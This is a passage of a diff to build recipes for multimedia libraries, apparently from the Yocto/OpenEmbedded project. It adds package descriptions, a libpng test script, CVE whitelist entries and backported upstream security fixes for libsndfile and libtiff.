+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/check/pipelines/seek.c b/tests/check/pipelines/seek.c
+index 28bb8846d..5f7447bc5 100644
+--- a/tests/check/pipelines/seek.c
++++ b/tests/check/pipelines/seek.c
+@@ -521,7 +521,7 @@ GST_START_TEST (test_loopback_2)
+ 
+   GST_INFO ("wait for segment done message");
+ 
+-  msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 2 * GST_SECOND,
++  msg = gst_bus_timed_pop_filtered (bus, GST_CLOCK_TIME_NONE,
+       GST_MESSAGE_SEGMENT_DONE | GST_MESSAGE_ERROR);
+   fail_unless (msg, "no message within the timed window");
+   fail_unless_equals_string (GST_MESSAGE_TYPE_NAME (msg), "segment-done");
+-- 
+2.29.2
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
index 7afe56cd7b..14793b7fdf 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
@@ -22,6 +22,7 @@ SRC_URI = " \
     file://0003-meson-Add-valgrind-feature.patch \
     file://0004-meson-Add-option-for-installed-tests.patch \
     file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \
+    file://0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch \
 "
 SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a"
 SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7"
@@ -40,7 +41,7 @@ PACKAGECONFIG[unwind] = "-Dlibunwind=enabled,-Dlibunwind=disabled,libunwind"
 PACKAGECONFIG[dw] = "-Dlibdw=enabled,-Dlibdw=disabled,elfutils"
 PACKAGECONFIG[bash-completion] = "-Dbash-completion=enabled,-Dbash-completion=disabled,bash-completion"
 PACKAGECONFIG[tools] = "-Dtools=enabled,-Dtools=disabled"
-PACKAGECONFIG[setcap] = ",,libcap libcap-native"
+PACKAGECONFIG[setcap] = "-Dptp-helper-permissions=capabilities,,libcap libcap-native"
 
 # TODO: put this in a gettext.bbclass patch
 def gettext_oemeson(d):
@@ -74,4 +75,20 @@ FILES_${PN}-dbg += "${datadir}/gdb ${datadir}/gstreamer-1.0/gdb"
 
 CVE_PRODUCT = "gstreamer"
 
+# CPE entries for gst-plugins-base are listed as gstreamer issues
+# so we need to ignore the false hits
+CVE_CHECK_WHITELIST += "CVE-2021-3522"
+
+# CPE entries for gst-plugins-good are listed as gstreamer issues
+# so we need to ignore the false hits
+CVE_CHECK_WHITELIST += "CVE-2021-3497"
+CVE_CHECK_WHITELIST += "CVE-2021-3498"
+CVE_CHECK_WHITELIST += "CVE-2022-1920"
+CVE_CHECK_WHITELIST += "CVE-2022-1921"
+CVE_CHECK_WHITELIST += "CVE-2022-1922"
+CVE_CHECK_WHITELIST += "CVE-2022-1923"
+CVE_CHECK_WHITELIST += "CVE-2022-1924"
+CVE_CHECK_WHITELIST += "CVE-2022-1925"
+CVE_CHECK_WHITELIST += "CVE-2022-2122"
+
 require gstreamer1.0-ptest.inc
diff --git a/meta/recipes-multimedia/lame/lame_3.100.bb b/meta/recipes-multimedia/lame/lame_3.100.bb
index 7f8996fb52..d007e0a495 100644
--- a/meta/recipes-multimedia/lame/lame_3.100.bb
+++ b/meta/recipes-multimedia/lame/lame_3.100.bb
@@ -1,5 +1,6 @@
 SUMMARY = "High quality MP3 audio encoder"
-HOMEPAGE = "http://lame.sourceforge.net/"
+DESCRIPTION = "LAME is an educational tool to be used for learning about MP3 encoding."
+HOMEPAGE = "https://lame.sourceforge.io/"
 BUGTRACKER = "http://sourceforge.net/tracker/?group_id=290&atid=100290"
 SECTION = "console/utils"
 LICENSE = "LGPLv2+"
diff --git a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
index 8ff8889b60..0ef5d947c3 100644
--- a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
+++ b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
@@ -1,4 +1,7 @@
 SUMMARY = "ATSC A/52 surround sound stream decoder"
+DESCRIPTION = "Library for decoding ATSC A/52 streams. The A/52 standard \
+is used in a variety of applications, including digital television \
+and DVD. It is also known as AC-3."
 HOMEPAGE = "http://liba52.sourceforge.net/"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
new file mode 100644
index 0000000000..0d1d0dc381
--- /dev/null
+++ b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
@@ -0,0 +1,21 @@
+configure contains CFLAGS filtering code which was removing our prefix-map
+flags. We need those to generate reproducible binaries. Allow them through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libid3tag-0.15.1b/configure.ac
+===================================================================
+--- libid3tag-0.15.1b.orig/configure.ac
++++ libid3tag-0.15.1b/configure.ac
+@@ -99,6 +99,10 @@ do
+ 	-mno-cygwin)
+ 	    shift
+ 	    ;;
++	-fmacro-prefix-map*|-fdebug-prefix-map*)
++	    CFLAGS="$CFLAGS $1"
++	    shift
++	    ;;
+ 	-m*)
+ 	    arch="$arch $1"
+ 	    shift
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
index 0312a610c0..80581765ac 100644
--- a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
+++ b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
@@ -15,6 +15,7 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/mad/libid3tag-${PV}.tar.gz \
            file://0001-Fix-gperf-3.1-incompatibility.patch \
            file://10_utf16.patch \
            file://unknown-encoding.patch \
+           file://cflags_filter.patch \
            "
 UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/mad/files/libid3tag/"
 UPSTREAM_CHECK_REGEX = "/projects/mad/files/libid3tag/(?P<pver>.*)/$"
diff --git a/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb b/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
index 271c2a30a3..8f3b76a920 100644
--- a/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
+++ b/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
@@ -4,7 +4,7 @@ DESCRIPTION = "Bellagio is an opensource implementation of the Khronos OpenMAX \
 HOMEPAGE = "http://omxil.sourceforge.net/"
 
 LICENSE = "LGPLv2.1+"
-LICENSE_FLAGS = "commercial"
+LICENSE_FLAGS = "${@bb.utils.contains('PACKAGECONFIG', 'amr', 'commercial', '', d)}"
 LIC_FILES_CHKSUM = "file://COPYING;md5=ae6f0f4dbc7ac193b50f323a6ae191cb \
                     file://src/omxcore.h;beginline=1;endline=27;md5=806b1e5566c06486fe8e42b461e03a90"
 
@@ -26,6 +26,10 @@ EXTRA_OECONF += "--disable-doc --disable-Werror"
 
 PROVIDES += "virtual/libomxil"
 
+PACKAGECONFIG ??= ""
+
+PACKAGECONFIG[amr] = "--enable-amr,,"
+
 #
 # The .so files under ${libdir}/bellagio are not intended to be versioned and symlinked.
 # Make sure they get packaged in the main package.
diff --git a/meta/recipes-multimedia/libpng/files/run-ptest b/meta/recipes-multimedia/libpng/files/run-ptest
new file mode 100644
index 0000000000..9ab5d0c1f4
--- /dev/null
+++ b/meta/recipes-multimedia/libpng/files/run-ptest
@@ -0,0 +1,29 @@
+#!/bin/sh
+
+set -eux
+
+./pngfix pngtest.png &> log.txt  2>&1
+
+if grep -i "OK" log.txt 2>&1 ; then
+   echo "PASS: pngfix passed"
+else
+   echo "FAIL: pngfix failed"
+fi
+rm -f log.txt
+
+./pngtest pngtest.png &> log.txt 2>&1
+
+if grep -i "PASS" log.txt 2>&1 ; then
+   echo "PASS: pngtest passed"
+else
+   echo "FAIL: pngtest failed"
+fi
+rm -f log.txt
+
+for i in pngstest timepng; do
+    if "./${i}" pngtest.png 2>&1; then
+        echo "PASS: $i"
+    else
+        echo "FAIL: $i"
+    fi
+done
diff --git a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
index 8c53d11642..9387fc8e2e 100644
--- a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
+++ b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
@@ -1,4 +1,7 @@
 SUMMARY = "PNG image format decoding library"
+DESCRIPTION = "An open source project to develop and maintain the reference \
+library for use in applications that read, create, and manipulate PNG \
+(Portable Network Graphics) raster image files. "
 HOMEPAGE = "http://www.libpng.org/"
 SECTION = "libs"
 LICENSE = "Libpng"
@@ -7,7 +10,10 @@ DEPENDS = "zlib"
 
 LIBV = "16"
 
-SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz"
+SRC_URI = "\
+           ${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz \
+           file://run-ptest \
+           "
 SRC_URI[md5sum] = "015e8e15db1eecde5f2eb9eb5b6e59e9"
 SRC_URI[sha256sum] = "505e70834d35383537b6491e7ae8641f1a4bed1876dbfe361201fc80868d88ca"
 
@@ -17,7 +23,7 @@ UPSTREAM_CHECK_URI = "http://libpng.org/pub/png/libpng.html"
 
 BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
 
-inherit autotools binconfig-disabled pkgconfig
+inherit autotools binconfig-disabled pkgconfig ptest
 
 # Work around missing symbols
 EXTRA_OECONF_append_class-target = " ${@bb.utils.contains("TUNE_FEATURES", "neon", "--enable-arm-neon=on", "--enable-arm-neon=off" ,d)}"
@@ -30,3 +36,11 @@ BBCLASSEXTEND = "native nativesdk"
 
 # CVE-2019-17371 is actually a memory leak in gif2png 2.x
 CVE_CHECK_WHITELIST += "CVE-2019-17371"
+
+do_install_ptest() {
+    install -m644 "${S}/pngtest.png" "${D}${PTEST_PATH}"
+    install -m755 "${B}/.libs/pngfix" "${D}${PTEST_PATH}"
+    install -m755 "${B}/.libs/pngtest" "${D}${PTEST_PATH}"
+    install -m755 "${B}/.libs/pngstest" "${D}${PTEST_PATH}"
+    install -m755 "${B}/.libs/timepng" "${D}${PTEST_PATH}"
+}
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
new file mode 100644
index 0000000000..b42d564b4b
--- /dev/null
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
@@ -0,0 +1,13 @@
+Index: libsamplerate-0.1.8/configure.ac
+===================================================================
+--- libsamplerate-0.1.8.orig/configure.ac
++++ libsamplerate-0.1.8/configure.ac
+@@ -53,7 +53,7 @@ AC_PROG_LN_S
+ #  6. If any interfaces have been removed since the last public release, then set age
+ #     to 0.
+ 
+-SHARED_VERSION_INFO="1:8:1"
++SHARED_VERSION_INFO="1:9:1"
+ 
+ 
+ 
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
index ae08189441..8345d6880f 100644
--- a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Audio Sample Rate Conversion library"
+DESCRIPTION = "Also known as Secret Rabbit Code - a library for performing sample rate conversion of audio data."
 HOMEPAGE = "http://www.mega-nerd.com/SRC/"
 SECTION = "libs"
 LICENSE = "BSD-2-Clause"
@@ -9,6 +10,7 @@ PR = "r1"
 
 SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \
            file://0001-configure.ac-improve-alsa-handling.patch \
+           file://shared_version_info.patch \
 "
 
 SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259"
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
new file mode 100644
index 0000000000..6354f856cb
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
@@ -0,0 +1,36 @@
+From a9815b3f228df00086e0a40bcc43162fc19896a1 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Wed, 17 Feb 2021 23:21:48 +0000
+Subject: [PATCH 1/2] wavlike: Fix incorrect size check
+
+The SF_CART_INFO_16K struct has an additional 4 byte field to hold
+the size of 'tag_text' which the file header doesn't, so don't
+include it as part of the check when looking for the max length.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26026
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/wavlike.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: libsndfile-1.0.28/src/wavlike.c
+===================================================================
+--- libsndfile-1.0.28.orig/src/wavlike.c
++++ libsndfile-1.0.28/src/wavlike.c
+@@ -803,7 +803,11 @@ wavlike_read_cart_chunk (SF_PRIVATE *psf
+ 		return 0 ;
+ 		} ;
+ 
+-	if (chunksize >= sizeof (SF_CART_INFO_16K))
++	/*
++	**	SF_CART_INFO_16K has an extra field 'tag_text_size' that isn't part
++	**	of the chunk, so don't include it in the size check.
++	*/
++	if (chunksize >= sizeof (SF_CART_INFO_16K) - 4)
+ 	{	psf_log_printf (psf, "cart : %u too big to be handled\n", chunksize) ;
+ 		psf_binheader_readf (psf, "j", chunksize) ;
+ 		return 0 ;
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
new file mode 100644
index 0000000000..d6b03d7d4d
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
@@ -0,0 +1,44 @@
+From deb669ee8be55a94565f6f8a6b60890c2e7c6f32 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Thu, 18 Feb 2021 21:52:09 +0000
+Subject: [PATCH 2/2] ms_adpcm: Fix and extend size checks
+
+'blockalign' is the size of a block, and each block contains 7 samples
+per channel as part of the preamble, so check against 'samplesperblock'
+rather than 'blockalign'. Also add an additional check that the block
+is big enough to hold the samples it claims to hold.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26803
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/ms_adpcm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/src/ms_adpcm.c b/src/ms_adpcm.c
+index 5e8f1a31..a21cb994 100644
+--- a/src/ms_adpcm.c
++++ b/src/ms_adpcm.c
+@@ -128,8 +128,14 @@ wavlike_msadpcm_init	(SF_PRIVATE *psf, int blockalign, int samplesperblock)
+ 	if (psf->file.mode == SFM_WRITE)
+ 		samplesperblock = 2 + 2 * (blockalign - 7 * psf->sf.channels) / psf->sf.channels ;
+ 
+-	if (blockalign < 7 * psf->sf.channels)
+-	{	psf_log_printf (psf, "*** Error blockalign (%d) should be > %d.\n", blockalign, 7 * psf->sf.channels) ;
++	/* There's 7 samples per channel in the preamble of each block */
++	if (samplesperblock < 7 * psf->sf.channels)
++	{	psf_log_printf (psf, "*** Error samplesperblock (%d) should be >= %d.\n", samplesperblock, 7 * psf->sf.channels) ;
++		return SFE_INTERNAL ;
++		} ;
++
++	if (2 * blockalign < samplesperblock * psf->sf.channels)
++	{	psf_log_printf (psf, "*** Error blockalign (%d) should be >= %d.\n", blockalign, samplesperblock * psf->sf.channels / 2) ;
+ 		return SFE_INTERNAL ;
+ 		} ;
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
new file mode 100644
index 0000000000..f7ae82588f
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
@@ -0,0 +1,30 @@
+From ced91d7b971be6173b604154c39279ce90ad87cc Mon Sep 17 00:00:00 2001
+From: yuan <ssspeed00@gmail.com>
+Date: Tue, 20 Apr 2021 16:16:32 +0800
+Subject: [PATCH] flac: Fix improper buffer reusing (#732)
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/ced91d7b971be6173b604154c39279ce90ad87cc]
+CVE: CVE-2021-4156
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/flac.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/src/flac.c b/src/flac.c
+index 0be82ac..4fa5cfa 100644
+--- a/src/flac.c
++++ b/src/flac.c
+@@ -952,7 +952,11 @@ flac_read_loop (SF_PRIVATE *psf, unsigned len)
+	/* Decode some more. */
+	while (pflac->pos < pflac->len)
+	{	if (FLAC__stream_decoder_process_single (pflac->fsd) == 0)
++		{	psf_log_printf (psf, "FLAC__stream_decoder_process_single returned false\n") ;
++			/* Current frame is busted, so NULL the pointer. */
++			pflac->frame = NULL ;
+			break ;
++			} ;
+		state = FLAC__stream_decoder_get_state (pflac->fsd) ;
+		if (state >= FLAC__STREAM_DECODER_END_OF_STREAM)
+		{	psf_log_printf (psf, "FLAC__stream_decoder_get_state returned %s\n", FLAC__StreamDecoderStateString [state]) ;
+--
+2.40.1
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
new file mode 100644
index 0000000000..e22b4e9389
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
@@ -0,0 +1,46 @@
+From 0754562e13d2e63a248a1c82f90b30bc0ffe307c Mon Sep 17 00:00:00 2001
+From: Alex Stewart <alex.stewart@ni.com>
+Date: Tue, 10 Oct 2023 16:10:34 -0400
+Subject: [PATCH] mat4/mat5: fix int overflow in dataend calculation
+
+The clang sanitizer warns of a possible signed integer overflow when
+calculating the `dataend` value in `mat4_read_header()`.
+
+```
+src/mat4.c:323:41: runtime error: signed integer overflow: 205 * -100663296 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:41 in
+src/mat4.c:323:48: runtime error: signed integer overflow: 838860800 * 4 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:48 in
+```
+
+Cast the offending `rows` and `cols` ints to `sf_count_t` (the type of
+`dataend` before performing the calculation, to avoid the issue.
+
+CVE: CVE-2022-33065
+Fixes: https://github.com/libsndfile/libsndfile/issues/789
+Fixes: https://github.com/libsndfile/libsndfile/issues/833
+
+Signed-off-by: Alex Stewart <alex.stewart@ni.com>
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/0754562e13d2e63a248a1c82f90b30bc0ffe307c]
+CVE: CVE-2022-33065
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/mat4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mat4.c b/src/mat4.c
+index 3c73680..e2f98b7 100644
+--- a/src/mat4.c
++++ b/src/mat4.c
+@@ -320,7 +320,7 @@ mat4_read_header (SF_PRIVATE *psf)
+				psf->filelength - psf->dataoffset, psf->sf.channels * psf->sf.frames * psf->bytewidth) ;
+		}
+	else if ((psf->filelength - psf->dataoffset) > psf->sf.channels * psf->sf.frames * psf->bytewidth)
+-		psf->dataend = psf->dataoffset + rows * cols * psf->bytewidth ;
++		psf->dataend = psf->dataoffset + (sf_count_t) rows * (sf_count_t) cols * psf->bytewidth ;
+
+	psf->datalength = psf->filelength - psf->dataoffset - psf->dataend ;
+
+--
+2.40.1
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
index b100108766..fb7d94ab75 100644
--- a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Audio format Conversion library"
+DESCRIPTION = "Library for reading and writing files containing sampled \
+sound (such as MS Windows WAV and the Apple/SGI AIFF format) through \
+one standard library interface."
 HOMEPAGE = "http://www.mega-nerd.com/libsndfile"
 AUTHOR = "Erik de Castro Lopo"
 DEPENDS = "flac libogg libvorbis"
@@ -17,7 +20,11 @@ SRC_URI = "http://www.mega-nerd.com/libsndfile/files/libsndfile-${PV}.tar.gz \
            file://CVE-2017-12562.patch \
            file://CVE-2018-19758.patch \
            file://CVE-2019-3832.patch \
-          "
+           file://CVE-2021-3246_1.patch \
+           file://CVE-2021-3246_2.patch \
+           file://CVE-2022-33065.patch \
+           file://CVE-2021-4156.patch \
+           "
 
 SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c"
 SRC_URI[sha256sum] = "1ff33929f042fa333aed1e8923aa628c3ee9e1eb85512686c55092d1e5a9dfa9"
diff --git a/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
new file mode 100644
index 0000000000..31f867e000
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
@@ -0,0 +1,52 @@
+From b12a0326e6064b6e0b051d1184a219877472f69b Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 25 Jan 2022 16:25:28 +0000
+Subject: [PATCH] tiffset: fix global-buffer-overflow for ASCII tags where
+ count is required (fixes #355)
+
+CVE: CVE-2022-22844
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/03047a26952a82daaa0792957ce211e0aa51bc64]
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+Comments: Add header stdint.h in tiffset.c explicitly for UINT16_MAX
+---
+ tools/tiffset.c | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiffset.c b/tools/tiffset.c
+index 8c9e23c5..e7a88c09 100644
+--- a/tools/tiffset.c
++++ b/tools/tiffset.c
+@@ -33,6 +33,7 @@
+ #include <string.h>
+ #include <stdlib.h>
+ 
++#include <stdint.h>
+ #include "tiffio.h"
+ 
+ static char* usageMsg[] = {
+@@ -146,9 +146,19 @@ main(int argc, char* argv[])
+ 
+             arg_index++;
+             if (TIFFFieldDataType(fip) == TIFF_ASCII) {
+-                if (TIFFSetField(tiff, TIFFFieldTag(fip), argv[arg_index]) != 1)
+-                    fprintf( stderr, "Failed to set %s=%s\n",
+-                             TIFFFieldName(fip), argv[arg_index] );
++                if(TIFFFieldPassCount( fip )) {
++                    size_t len;
++                    len = strlen(argv[arg_index]) + 1;
++                    if (len > UINT16_MAX || TIFFSetField(tiff, TIFFFieldTag(fip),
++                            (uint16_t)len, argv[arg_index]) != 1)
++                        fprintf( stderr, "Failed to set %s=%s\n",
++                            TIFFFieldName(fip), argv[arg_index] );
++                } else {
++                    if (TIFFSetField(tiff, TIFFFieldTag(fip),
++                            argv[arg_index]) != 1)
++                        fprintf( stderr, "Failed to set %s=%s\n",
++                            TIFFFieldName(fip), argv[arg_index] );
++                }
+             } else if (TIFFFieldWriteCount(fip) > 0
+ 		       || TIFFFieldWriteCount(fip) == TIFF_VARIABLE) {
+                 int     ret = 1;
+-- 
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..9b4724a325
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,148 @@
+From 02875964eba5c4a2ea98c41562835428214adfe7 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sat, 7 Mar 2020 13:21:56 +0100
+Subject: [PATCH] tiff2rgba: output usage to stdout when using -h
+
+also uses std C EXIT_FAILURE / EXIT_SUCCESS
+see #17
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 39 ++++++++++++++++++++++++---------------
+ 1 file changed, 24 insertions(+), 15 deletions(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/02875964eba5c4a2ea98c41562835428214adfe7.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index 2eb6f6c4..ef643653 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -39,6 +39,13 @@
+ #include "tiffiop.h"
+ #include "tiffio.h"
+ 
++#ifndef EXIT_SUCCESS
++#define EXIT_SUCCESS 0
++#endif
++#ifndef EXIT_FAILURE
++#define EXIT_FAILURE 1
++#endif
++
+ #define	streq(a,b)	(strcmp(a,b) == 0)
+ #define	CopyField(tag, v) \
+     if (TIFFGetField(in, tag, &v)) TIFFSetField(out, tag, v)
+@@ -68,7 +75,7 @@ main(int argc, char* argv[])
+ 	extern char *optarg;
+ #endif
+ 
+-	while ((c = getopt(argc, argv, "c:r:t:bn8")) != -1)
++	while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
+ 		switch (c) {
+ 			case 'b':
+ 				process_by_block = 1;
+@@ -86,7 +93,7 @@ main(int argc, char* argv[])
+ 				else if (streq(optarg, "zip"))
+ 					compression = COMPRESSION_DEFLATE;
+ 				else
+-					usage(-1);
++					usage(EXIT_FAILURE);
+ 				break;
+ 
+ 			case 'r':
+@@ -105,17 +112,20 @@ main(int argc, char* argv[])
+ 				bigtiff_output = 1;
+ 				break;
+ 
++			case 'h':
++				usage(EXIT_SUCCESS);
++				/*NOTREACHED*/
+ 			case '?':
+-				usage(0);
++				usage(EXIT_FAILURE);
+ 				/*NOTREACHED*/
+ 		}
+ 
+ 	if (argc - optind < 2)
+-		usage(-1);
++		usage(EXIT_FAILURE);
+ 
+ 	out = TIFFOpen(argv[argc-1], bigtiff_output?"w8":"w");
+ 	if (out == NULL)
+-		return (-2);
++		return (EXIT_FAILURE);
+ 
+ 	for (; optind < argc-1; optind++) {
+ 		in = TIFFOpen(argv[optind], "r");
+@@ -132,7 +142,7 @@ main(int argc, char* argv[])
+ 		}
+ 	}
+ 	(void) TIFFClose(out);
+-	return (0);
++	return (EXIT_SUCCESS);
+ }
+ 
+ static int
+@@ -166,7 +176,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+     if (tile_width != (rastersize / tile_height) / sizeof( uint32))
+     {
+ 	TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+-	exit(-1);
++	exit(EXIT_FAILURE);
+     }
+     raster = (uint32*)_TIFFmalloc(rastersize);
+     if (raster == 0) {
+@@ -182,7 +192,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+     if (tile_width != wrk_linesize / sizeof (uint32))
+     {
+         TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+-	exit(-1);
++	exit(EXIT_FAILURE);
+     }
+     wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+     if (!wrk_line) {
+@@ -279,7 +289,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+     if (width != (rastersize / rowsperstrip) / sizeof( uint32))
+     {
+ 	TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+-	exit(-1);
++	exit(EXIT_FAILURE);
+     }
+     raster = (uint32*)_TIFFmalloc(rastersize);
+     if (raster == 0) {
+@@ -295,7 +305,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+     if (width != wrk_linesize / sizeof (uint32))
+     {
+         TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+-	exit(-1);
++	exit(EXIT_FAILURE);
+     }
+     wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+     if (!wrk_line) {
+@@ -528,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+             return( cvt_whole_image( in, out ) );
+ }
+ 
+-static char* stuff[] = {
++const static char* stuff[] = {
+     "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+     "where comp is one of the following compression algorithms:",
+     " jpeg\t\tJPEG encoding",
+@@ -547,13 +557,12 @@ static char* stuff[] = {
+ static void
+ usage(int code)
+ {
+-	char buf[BUFSIZ];
+ 	int i;
++	FILE * out = (code == EXIT_SUCCESS) ? stdout : stderr;
+ 
+-	setbuf(stderr, buf);
+-        fprintf(stderr, "%s\n\n", TIFFGetVersion());
++        fprintf(out, "%s\n\n", TIFFGetVersion());
+ 	for (i = 0; stuff[i] != NULL; i++)
